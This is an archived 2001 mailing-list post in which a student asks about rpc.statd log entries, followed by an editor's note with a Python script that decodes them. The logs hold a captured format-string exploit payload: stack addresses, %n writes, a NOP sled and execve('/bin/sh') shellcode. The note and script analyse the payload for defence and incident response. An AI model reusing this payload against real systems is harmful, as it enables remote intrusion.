[techtalk] Should I feel honored?

Kath ranger at optonline.net
Fri Apr 20 17:39:38 EST 2001


I decided to review my own logs (I know I should do it more often).

Apparently, my web server has been attacked repeatedly and, if the IP is true (if I am reading it right; maybe it is just mumbo jumbo I'm misinterpreting), it is coming from USC.
Here is the log:

Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7
\xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Apr 18 15:25:08 hwnet \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^A\xcd\200\xe8\177\xff\xff\xff

Now, if I am not reading too much into it, I clearly see the IP "236x%n%137x%n%10x%n%192".  Does that mean 236.137.10.192?  

Now popping that IP into the whois at arin.net yielded this:
University of Southern California (NET-MCAST-NET)
   Information Sciences Institute
   4676 Admiralty Way
   Marina Del Rey, CA 90292-6695
   US

   Netname: MCAST-NET
   Netblock: 224.0.0.0 - 239.255.255.255

   Coordinator:
      Internet Corporation for Assigned Names and Numbers  (IANA-ARIN)  iana at IANA.ORG
      (310) 823-9358

   Domain System inverse mapping provided by:

   FLAG.EP.NET   198.32.4.13
   STRUL.STUPI.SE  192.108.200.1 192.36.143.3
   NS.ISI.EDU   128.9.128.127
   NIC.NEAR.NET   192.52.71.4

   Record last updated on 12-Sep-2000.
   Database last updated on 20-Apr-2001 00:14:29 EDT.

Could it be a spoofed address?  A compromised machine doing the scanning?  Some script kiddy kid sitting in his dorm room?

What is my course of action now?  My main page hasn't been defaced with pictures of someone's grandma in compromising poses, so I guess that is a good first sign the attack didn't work?  Or did it work, and my machine has been compromised and is now being used for DDoS or a w4r3z britney spears mp3 porn server?

I will notify the sysadmin of my school district (I'm a student) of this, of course.

If that IP is true, should I be contacting a USC sysadmin?  I would feel especially responsible if it was some poor sysadmin's compromised machine at another school.

- Kath, the perpetually worried
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://linuxchix.org/pipermail/techtalk/attachments/20010420/9dbf1e00/attachment.xhtml
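Editor's note with an added example (this code is not from the post or from any of the tools mentioned in it). The two syslog lines above are the signature of the rpc.statd format-string hole from mid-2000 (CVE-2000-0666): rpc.statd passed the client-supplied name to syslog() as a format string. Read that way, the line decomposes into the classic pieces: the `^X\xf7\xff\xbf` groups at the front are little-endian i386 stack addresses (0xbffff718 through 0xbffff71b, each given twice), the `%8x` conversions walk up the stack to reach them, `%236x%n%137x%n%10x%n%192x%n` are printf field widths followed by `%n` writes that store a chosen byte count into each of those addresses, the long run of `\220` is 0x90 NOP bytes, and the second line is shellcode that assembles "/bin/sh" in memory and calls execve and exit through `int $0x80`. The script below decodes the lines and reports exactly that. It assumes syslogd escaped bytes three ways (`^X` caret notation for control bytes, `\xHH` hex, `\NNN` octal), that 0xbf000000-0xbfffffff is the user stack region, and it shortens the NOP sled, which wraps across several lines in the archive, to 40 bytes; the benign comparison line is constructed.

```python
import re

# Constructed copy of the first rpc.statd line from the post; the NOP sled is
# shortened to 40 bytes (assumption), everything else is the posted bytes.
SAMPLE_LINE = (
    "Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for "
    "^X\\xf7\\xff\\xbf^X\\xf7\\xff\\xbf^Y\\xf7\\xff\\xbf^Y\\xf7\\xff\\xbf"
    "^Z\\xf7\\xff\\xbf^Z\\xf7\\xff\\xbf^[\\xf7\\xff\\xbf^[\\xf7\\xff\\xbf"
    "%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n"
    + "\\220" * 40
)
# The second line from the post (the shellcode), copied as logged.
SHELLCODE_LINE = (
    "Apr 18 15:25:08 hwnet \\xc7^F/bin\\xc7F^D/shA0\\xc0\\210F^G\\211v^L"
    "\\215V^P\\215N^L\\211\\xf3\\xb0^K\\xcd\\200\\xb0^A\\xcd\\200\\xe8\\177\\xff\\xff\\xff"
)
# A constructed benign line: a real client name containing an IP, no format escapes.
BENIGN_LINE = "Apr 18 15:30:01 hwnet /sbin/rpc.statd[177]: gethostbyname error for 10.0.0.5"

STACK_LO, STACK_HI = 0xBF000000, 0xC0000000   # i386 Linux user stack range (assumption)
MARKER = "gethostbyname error for "


def unescape_syslog(text: str) -> bytes:
    """Undo the escaping syslogd applied to non-printable bytes (assumed conventions):
    ^X caret notation (0x18), \\xHH hex, \\NNN octal.  Other characters are literal."""
    out = bytearray()
    i = 0
    while i < len(text):
        c = text[i]
        if c == "\\" and i + 1 < len(text):
            if text[i + 1] == "x" and re.fullmatch(r"[0-9a-fA-F]{2}", text[i + 2:i + 4]):
                out.append(int(text[i + 2:i + 4], 16))
                i += 4
                continue
            m = re.match(r"\\([0-7]{3})", text[i:])
            if m:
                out.append(int(m.group(1), 8))
                i += 4
                continue
        if c == "^" and i + 1 < len(text) and "@" <= text[i + 1] <= "_":
            out.append(ord(text[i + 1]) ^ 0x40)
            i += 2
            continue
        out.append(ord(c))
        i += 1
    return bytes(out)


def analyze_statd_line(line: str) -> dict:
    """Classify the attacker-controlled name in an rpc.statd gethostbyname message."""
    if MARKER not in line:
        return {"verdict": "not a statd gethostbyname message"}
    payload = unescape_syslog(line.split(MARKER, 1)[1])

    # Leading little-endian words inside the stack range: the %n write targets.
    targets, pos = [], 0
    while pos + 4 <= len(payload):
        word = int.from_bytes(payload[pos:pos + 4], "little")
        if not STACK_LO <= word < STACK_HI:
            break
        targets.append(word)
        pos += 4

    # printf conversions.  A width such as %236x pads the output so the byte count
    # that the following %n stores into the target has the value the attacker wants.
    convs = re.findall(rb"%(\d*)([a-zA-Z])", payload)
    n_count = sum(1 for _, c in convs if c == b"n")
    pad_before_n = [int(pw or 0) for (pw, _), (_, c) in zip(convs, convs[1:]) if c == b"n"]

    # Longest run of 0x90 (i386 NOP): the sled the redirected return lands in.
    sled = max((len(m) for m in re.findall(rb"\x90+", payload)), default=0)

    # Is there an actual dotted quad in the name?  In the attack line there is not:
    # the digits 236, 137, 10 and 192 are field widths, not an address.
    ip_like = re.search(rb"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", payload) is not None

    verdict = "format-string exploit attempt" if n_count and targets else "no format-string indicators"
    return {"verdict": verdict, "targets": sorted(set(targets)), "n_writes": n_count,
            "pad_before_n": pad_before_n, "nop_sled": sled, "ip_like": ip_like}


def analyze_shellcode_line(line: str) -> dict:
    """The continuation line is raw shellcode logged after the hostname field."""
    raw = unescape_syslog(line.split(" ", 4)[4])
    return {
        "builds_bin_sh": b"/bin" in raw and b"/sh" in raw,  # "/shA" with A later zeroed
        "int80_count": raw.count(b"\xcd\x80"),              # int $0x80: execve, then exit
    }


if __name__ == "__main__":
    for name, line in (("attack", SAMPLE_LINE), ("benign", BENIGN_LINE)):
        r = analyze_statd_line(line)
        print(name, r["verdict"], [hex(t) for t in r.get("targets", [])], r.get("pad_before_n"))
    print("shellcode", analyze_shellcode_line(SHELLCODE_LINE))
```

Two practical consequences follow from the decode. First, the line never contained the client's address at all (rpc.statd did not log it), so the source has to come from a packet-filter log or a sniffer on the same segment; the whois result above is simply the 224.0.0.0/4 multicast block that "236.137.10.192" falls into, which is why it pointed at IANA and ISI rather than a real site. Second, a log entry shows only that the attempt was made, not whether it succeeded: if the write targets matched this machine's stack layout, the shellcode ran with rpc.statd's privileges and left nothing on the web page, so the useful checks are whether rpc.statd on this host was patched for the 2000 format-string bug, whether it is reachable from the Internet at all, and whether the machine has listeners or accounts that were not there before.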


More information about the Techtalk mailing list